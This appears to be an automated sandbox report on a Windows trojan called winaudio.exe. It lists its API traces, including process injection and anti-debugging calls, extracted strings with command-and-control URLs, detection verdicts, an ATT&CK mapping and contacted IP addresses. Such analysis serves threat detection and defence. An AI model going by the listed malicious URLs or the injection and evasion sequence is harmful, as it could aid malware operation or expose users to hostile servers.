Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00346420 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00346420
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002B11E0 rdtsc 0_2_002B11E0
Source: C:\Users\user\Desktop\winaudio.exeWindow / User API: threadDelayed 519Jump to behavior
Source: C:\Users\user\Desktop\winaudio.exeFile opened / queried: C:\Windows\Temp\vmware24A.datJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeCode function: GetLastError,new,GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,wsprintfA,0_2_002DE070
Source: C:\Users\user\Desktop\winaudio.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0038F8BD FindFirstFileExA,0_2_0038F8BD
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D6370 GetProcessImageFileNameA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,QueryDosDeviceA,QueryDosDeviceA,GetLastError,QueryDosDeviceA,0_2_002D6370
Source: winaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Windows\Temp\vmware24A.dat
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: CertAddCertificateContextToStoreCertOpenStoreCertCloseStoreCertFreeCertificateContextcrypt32.dll201225024508Zwww.2345.com251225024508Z127.0.0.1OriginalFilenameUnmapViewOfFilec:\windows\temp\winaudio.dllWindowTagMapViewOfFileSoftware\Licenses\VarFileInfo\TranslationKernel32.dllConsoleOpenFileMappingA*.net.cnVirtualFreeExhttps22.ttfGET LoadLibraryAhttp://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.dat*.com.cnserver.derserver.key20210720RefererSOFTWARE\GMPROT\http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebugPrivilege\StringFileInfo\OpenProcessja002CreateFileMappingA/apiplay/Cept_Sp/reportVirtualAllocEx%s,%02X-%02X-%02X-%02X-%02X-%02X/apiplay/H_S_Timing/report{Z3CD-FA87-B5E6-0SYI}Process32NextPOST comfrom client requestFlushViewOfFile.cnCreateToolhelp32SnapshotGlobal\55644A24E6234CD6B989BEAA7D8725B0Process32FirstWaitForSingleObject HTTPnet{abababab-baba-abab-baba-ecf4bb862ded}vmware24A.datfrom server responsesi-2n*8o_5brl-kq30ok.net.cnWriteProcessMemoryIsWow64ProcessHostDNS.%d:*.%s,DNS.%d:%s,ja001C:\Windows\Temp\%shttp://gmt.yunliao8.com:10100/plusxyzsCreateRemoteThreadhttps11.jpgX
Source: winaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Windows\Temp\vmware24A.datwinaudioC:\Users\user\Desktop\C:\Users\user\Desktop\inaudio.exeJ
Source: winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vmware24A.dat
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0037F7A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F7A7
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00346420 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00346420
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00346420 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00346420
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002B11E0 rdtsc 0_2_002B11E0
Source: C:\Users\user\Desktop\winaudio.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_00383DA2 mov eax, dword ptr fs:[00000030h]0_2_00383DA2
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002DD870 SetUnhandledExceptionFilter,0_2_002DD870
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_0037F7A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F7A7
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002E0871 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002E0871
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002E0EAA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002E0EAA

HIPS / PFW / Operating System Protection Evasion

barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D5C20 GetLastError,OpenProcess,GetLastError,VirtualAllocEx,GetLastError,WriteProcessMemory,GetLastError,CreateRemoteThread,GetLastError,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,0_2_002D5C20
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002B1000 cpuid 0_2_002B1000
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002E107B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002E107B
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002DE5D0 GetVersionExW,wsprintfA,0_2_002DE5D0
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D3610 socket,htons,inet_addr,setsockopt,bind,listen,closesocket,ioctlsocket,ioctlsocket,accept,select,getsockopt,ioctlsocket,recv,ioctlsocket,closesocket,closesocket,closesocket,closesocket,closesocket,closesocket,CloseHandle,0_2_002D3610
Source: C:\Users\user\Desktop\winaudio.exeCode function: 0_2_002D1C10 socket,GetLastError,inet_addr,htons,bind,GetLastError,closesocket,listen,0_2_002D1C10

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		1
Modify Registry		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium12
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Native API		Boot or Logon Initialization Scripts11
Process Injection		2
Virtualization/Sandbox Evasion		LSASS Memory41
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Access Token Manipulation		Security Account Manager2
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingData Transfer Size Limits4
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common31
Obfuscated Files or Information		Cached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Install Root Certificate		DCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem2
File and Directory Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow13
System Information Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
winaudio.exe67%ReversingLabsWin32.Trojan.Razy
winaudio.exe77%VirustotalBrowse
winaudio.exe100%AviraHEUR/AGEN.1243897
winaudio.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.winaudio.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1215508Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://41ku.cn10100plusxyz0%Avira URL Cloudsafe
http://41ku.cn:10100/plusxyzszssxyzs100%Avira URL Cloudmalware
http://8awang.com:10100/plusxyzs100%Avira URL Cloudmalware
http://gmt.yunliao8.com:10100/plusxyzs0%Avira URL Cloudsafe
http://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.dat100%Avira URL Cloudmalware
http://gmt.yunliao8.com:10100/plusxyzsCreateRemoteThreadhttps11.jpgX0%Avira URL Cloudsafe
http://41ku.cn:10100/plusxyzs100%Avira URL Cloudmalware
http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebu100%Avira URL Cloudmalware
http://41ku.cn100%Avira URL Cloudmalware
http://41ku.cn:10100/dfghb100%Avira URL Cloudmalware
https://www.127.0.0.1TopLevelExceptionFilter0%Avira URL Cloudsafe
http://63634.top:8081/kodedc100%Avira URL Cloudmalware
http://wukong.cn:10010/feazh0%Avira URL Cloudsafe
http://63634.top:8081/koded100%Avira URL Cloudmalware
http://wukong.cn:10010/feazhb0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
8awang.com
103.224.212.220
truefalse
    		unknown
    opencdnpicrmb.gshifen.com
    		104.193.88.112
    		truefalse
      		unknown
      41ku.cn
      		103.86.67.66
      		truefalse
        		unknown
        hiphotos.gshifen.com
        		104.193.88.109
        		truefalse
          		unknown
          www.2345.com.w.alikunlun.com
          		79.133.177.216
          		truefalse
            		unknown
            gmt.yunliao8.com
            		unknown
            		unknowntrue
              		unknown
              imgsrc.baidu.com
              		unknown
              		unknownfalse
                		high
                www.2345.com
                		unknown
                		unknownfalse
                  		high
                  pic.rmb.bdstatic.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://41ku.cn:10100/plusxyzsfalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://41ku.cn:10100/dfghbwinaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://41ku.cn:10100/plusxyzszssxyzswinaudio.exe, 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://8awang.com:10100/plusxyzswinaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://gmt.yunliao8.com:10100/plusxyzswinaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://41ku.cn:10100/plusxyzs5B7C84755D8041139A7AEBA6F4E5912F.datwinaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://8awang.com:10100/plusxyzsxxx.xxxxxxxxxx.xxx%02X-%02X-%02X-%02X-%02X-%02Xja003server.crtSeDebuwinaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://41ku.cn10100plusxyzwinaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://41ku.cnwinaudio.exe, 00000000.00000002.508867059.0000000000F69000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://gmt.yunliao8.com:10100/plusxyzsCreateRemoteThreadhttps11.jpgXwinaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.127.0.0.1TopLevelExceptionFilterwinaudio.exe, 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://63634.top:8081/kodedwinaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://wukong.cn:10010/feazhbwinaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://63634.top:8081/kodedcwinaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://wukong.cn:10010/feazhwinaudio.exe, winaudio.exe, 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.openssl.org/support/faq.htmlwinaudio.exe, 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      103.86.67.66
                      		41ku.cnHong Kong
                      		132721PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLfalse
                      185.10.104.120
                      		unknownEuropean Union
                      		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                      103.224.212.220
                      		8awang.comAustralia
                      		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                      79.133.177.214
                      		unknownRussian Federation
                      		43882SOTLINE-ASRUfalse
                      79.133.177.211
                      		unknownRussian Federation
                      		43882SOTLINE-ASRUfalse
                      104.193.90.80
                      		unknownUnited States
                      		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                      185.10.104.115
                      		unknownEuropean Union
                      		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                      104.193.88.112
                      		opencdnpicrmb.gshifen.comUnited States
                      		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                      79.133.177.218
                      		unknownRussian Federation
                      		43882SOTLINE-ASRUfalse
                      79.133.177.216
                      		www.2345.com.w.alikunlun.comRussian Federation
                      		43882SOTLINE-ASRUfalse
                      79.133.177.215
                      		unknownRussian Federation
                      		43882SOTLINE-ASRUfalse
                      104.193.88.109
                      		hiphotos.gshifen.comUnited States
                      		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse

                      Private

                      IP
                      192.168.2.1
                      127.0.0.1

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:794053
                      Start date and time:2023-01-30 07:39:08 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 41s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:winaudio.exe
                      Detection:MAL
                      Classification:mal84.bank.troj.evad.winEXE@2/2@20/14
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 97.7% (good quality ratio 89.1%)
                      • Quality average: 76.6%
                      • Quality standard deviation: 31.3%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 41
                      • Number of non-executed functions: 80
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      185.10.104.120http://baidu.comGet hashmaliciousBrowse
                      • t12.baidu.com/it/u=4220765120,4182187051&fm=58
                      http://baidu.comGet hashmaliciousBrowse
                      • t10.baidu.com/it/u=3772794375,258756471&fm=58
                      103.224.212.220lJt3mQqCQl.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      xIwkOnjSIa.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      IU28r0EZFA.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      ViNIRfmQmE.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      Ee3RWj3ID9.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      YB7v7UFV3j.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      B0U3oOhQJu.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      1WImqfBvqH.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      zTg6FfsIq1.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      8ML9vWcUAh.dllGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      e9TfH3jxO1.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      6jtNVDiwz9.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      tkxl2AyS35.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      vcLgaDtq2Y.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      wS1IlhGZ6O.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      DWs0ZsrcWc.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      kqfUnYC566.exeGet hashmaliciousBrowse
                      • www.harborretired.com/u8ow/?7n=mm75bpfr/q3J3/5vlEPd4uiipkI9FPxWHgTfOfxnVBdc0FbZv+FViyjvSfZlk7ZF1yqY4kXRZw==&fHAh7=_txXAd6
                      iH34IwDgCX.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      UKfz9ypQ3N.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                      7jLUw8OOEn.exeGet hashmaliciousBrowse
                      • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      8awang.comc5twLLnwwY.exeGet hashmaliciousBrowse
                      • 154.196.133.108
                      opencdnpicrmb.gshifen.comhttp://www.rfmss.com/index.phpGet hashmaliciousBrowse
                      • 185.10.104.115
                      jlhcJUOvD.exeGet hashmaliciousBrowse
                      • 104.193.88.112
                      http://krogerbeerevents.comGet hashmaliciousBrowse
                      • 185.10.104.115
                      jiangshan.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      #U539f#U795e#U4e16#U754c.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      #U91d1#U57ce#U8d85#U53d8.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      1.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      #U3010#U4e71#U4e16#U8ff7#U5931#U3011.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      #U25c6#U5c71#U6cb3#U5251#U5fc3#U25c6#U300e#U5251#U6765#U2160#U533a#U300f.exeGet hashmaliciousBrowse
                      • 185.10.104.115
                      SecuriteInfo.com.Variant.Fugrafa.163184.15855.exeGet hashmaliciousBrowse
                      • 185.10.104.115

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdUl8riCOJX8.elfGet hashmaliciousBrowse
                      • 182.61.224.190
                      FedEx Shippings DOC.exeGet hashmaliciousBrowse
                      • 154.85.48.36
                      FedEx Shipping Documents.exeGet hashmaliciousBrowse
                      • 154.85.50.247
                      zqipOzFP3u.elfGet hashmaliciousBrowse
                      • 182.61.27.146
                      ONEYMESC15768700_noncopy_20230124102200.exeGet hashmaliciousBrowse
                      • 154.85.59.202
                      6cP3aSj6Bj.exeGet hashmaliciousBrowse
                      • 104.193.88.126
                      6cP3aSj6Bj.exeGet hashmaliciousBrowse
                      • 104.193.88.126
                      app-release-252396-o_1e2uh3ilp127siap2u6tj14u9r-uid-2672184.apkGet hashmaliciousBrowse
                      • 103.235.47.161
                      RFQ.exeGet hashmaliciousBrowse
                      • 154.85.59.202
                      naZZ0BK2hf.elfGet hashmaliciousBrowse
                      • 182.61.224.145
                      #U5f81#U7a0b#U4f20#U5947ZC176.COM.exeGet hashmaliciousBrowse
                      • 103.235.46.191
                      http://hfbuauw.cn/alicorpxh/tb.php?iy=sm1672330577850Get hashmaliciousBrowse
                      • 103.235.46.191
                      http://www.estevescaricaturas.com/Get hashmaliciousBrowse
                      • 103.235.46.191
                      #U91cd#U8981#U901a#U77e5#Uff01.docxGet hashmaliciousBrowse
                      • 103.235.46.191
                      http://lightnaive.cn/la-poste/tb.php?jl=md1671096278691Get hashmaliciousBrowse
                      • 103.235.46.191
                      http://vskytech.comGet hashmaliciousBrowse
                      • 103.235.46.191
                      http://www.kylock.com/index.phpGet hashmaliciousBrowse
                      • 103.235.46.191
                      4zmosWMwgE.elfGet hashmaliciousBrowse
                      • 182.61.11.255
                      rup2XeFHTu.exeGet hashmaliciousBrowse
                      • 103.235.46.64
                      rup2XeFHTu.exeGet hashmaliciousBrowse
                      • 103.235.46.64
                      PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLwlaDUS4Co5.exeGet hashmaliciousBrowse
                      • 45.125.218.235
                      SvjkMvTTOW.exeGet hashmaliciousBrowse
                      • 45.125.218.235
                      FedEx Shipment doc.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      TNT Shipment doc.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.Win64.CrypterX-gen.10026.27258.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.W32.GenKryptik.FYXW.tr.26324.25853.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      documents.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      TNT Shipment doc.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      bank copy.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      documents.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      DHL Original BL, PL, CI Copies.htm.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      Awb_shipping_BL_doc_48600000000000002422.pdf.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.Variant.Jaik.77520.18246.10542.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.Variant.Cerbu.159497.16352.1761.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.W64.KryptoCibule.A.gen.Eldorado.23973.26459.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      Swift copy.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      SecuriteInfo.com.Win64.PWSX-gen.2865.24466.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      FedEx Shipment doc.exeGet hashmaliciousBrowse
                      • 185.224.170.82
                      TNT Shipment doc.exeGet hashmaliciousBrowse
                      • 185.224.170.82

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      fd80fa9c6120cdeea8520510f3c644acl.out.elfGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      RT.msiGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      Ac372JNTO6.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      6v8QbANftP.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      6v8QbANftP.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      spjYwLgrAT.exeGet hashmaliciousBrowse
                      • 79.133.177.214
                      • 79.133.177.211
                      • 79.133.177.218
                      • 79.133.177.216
                      • 79.133.177.215
                      spjYwLgrAT.exeGet hashmaliciousBrowse
                      • 79.133.177.214
